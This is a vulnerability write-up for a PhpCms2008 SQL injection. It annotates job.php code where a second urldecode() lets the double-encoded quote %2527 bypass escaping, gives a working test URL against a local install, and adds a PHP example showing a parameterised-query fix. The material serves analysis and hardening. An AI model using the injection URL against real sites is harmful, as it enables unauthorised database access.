PhpCms2008 injection vulnerability 0day
Code analysis notes:
case "list":
    $catid = intval($catid);
    $head["keywords"] .= "职位列表";
    $head["title"] .= "职位列表"."_".$PHPCMS["sitename"];
    $head["description"] .= "职位列表"."_".$PHPCMS["sitename"];
    $templateid = "job_list";
    if($inputtime)
        $time = time() - 3600*$inputtime*24;
    else $time = 0;
    if($time < 0) $time = 0;
    $where = "j.updatetime >= '{$time}' ";
    $genre = urldecode($genre); // urldecode decodes the URL a second time: double-encoded input (%2527) gets past the single-quote escaping.
    $genre = str_replace(array("(", "$", ")", "{", "}", "<", ">"), "", $genre); // The author suddenly got careful here, which causes us trouble. Keep reading.
    if($station) $where .= "AND j.station = '{$station}' ";
    if($genre) $where .= "AND c.genre = '{$genre}' ";
    if(!trim($where)) $where = "1";
    break;

case "searchlist":
    // ...
case "search":
    // ...
case "applylist":
    $head["keywords"] .= "简历列表";
    $head["description"] .= "简历列表"."_".$PHPCMS["sitename"];
    $head["title"] .= "简历列表"."_".$PHPCMS["sitename"];
    $templateid = "job_applylist";

    if($inputtime)
        $time = time() - 3600*$inputtime*24;
    else $time = 0;
    if($time < 0) $time = 0;
    $where = "edittime >= '{$time}' ";
    $genre = urldecode($genre); // Good~~~ (no filtering this time)
    if($experience) $where .= "AND experience >= '{$experience}' ";
    if($genre) $where .= "AND edulevel = '{$genre}' "; // Successfully reaches the SQL statement.
Vulnerability test:
http://127.0.0.1/phpcms/yp/job.php?action=applylist&genre=1111%2527or%201=1%23
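The following is an added example, not PhpCms code: it traces how the second urldecode() in the applylist branch reopens the quote that PHP's own request decoding and magic_quotes/addslashes had already handled, and shows the bound-parameter replacement. The table and column names, the SQLite fixture and the request value are constructed for the demonstration.

```php
<?php
// Added example (not PhpCms code). Demonstrates the double-decode problem
// from the applylist case and its parameterised fix.

// What PHP hands the script for genre=1111%2527or%201=1%23 after its own
// single URL decode: %2527 has become %27, so no quote character exists yet.
$raw = "1111%27or 1=1#";            // constructed request value

// Escaping layer of that era (magic_quotes_gpc / addslashes): nothing to escape.
$escaped = addslashes($raw);        // unchanged

// The application's extra urldecode() turns %27 back into a quote.
$genre = urldecode($escaped);       // 1111'or 1=1#

// Same string concatenation as the applylist case on the page.
function build_where_vulnerable(string $genre, int $time = 0): string {
    $where = "edittime >= '{$time}' ";
    if ($genre) $where .= "AND edulevel = '{$genre}' ";
    return $where;
}
echo build_where_vulnerable($genre), "\n";
// edittime >= '0' AND edulevel = '1111'or 1=1#'
// The quote is closed and, on MySQL, '#' comments out the trailing quote.

// Hardened version: do not decode request input a second time, and pass the
// value as a bound parameter so it can only ever be compared as data.
function count_applicants(PDO $db, string $genre, int $time = 0): int {
    $stmt = $db->prepare(
        "SELECT COUNT(*) FROM applicants WHERE edittime >= :time AND edulevel = :genre");
    $stmt->bindValue(':time', $time, PDO::PARAM_INT);
    $stmt->bindValue(':genre', $genre, PDO::PARAM_STR);
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Constructed in-memory fixture standing in for the site database.
$db = new PDO('sqlite::memory:');
$db->exec("CREATE TABLE applicants (edulevel TEXT, edittime INTEGER)");
$db->exec("INSERT INTO applicants VALUES ('bachelor', 100), ('master', 200)");
echo count_applicants($db, $genre), "\n";   // 0: the payload is matched literally, not executed
echo count_applicants($db, 'master'), "\n"; // 1
```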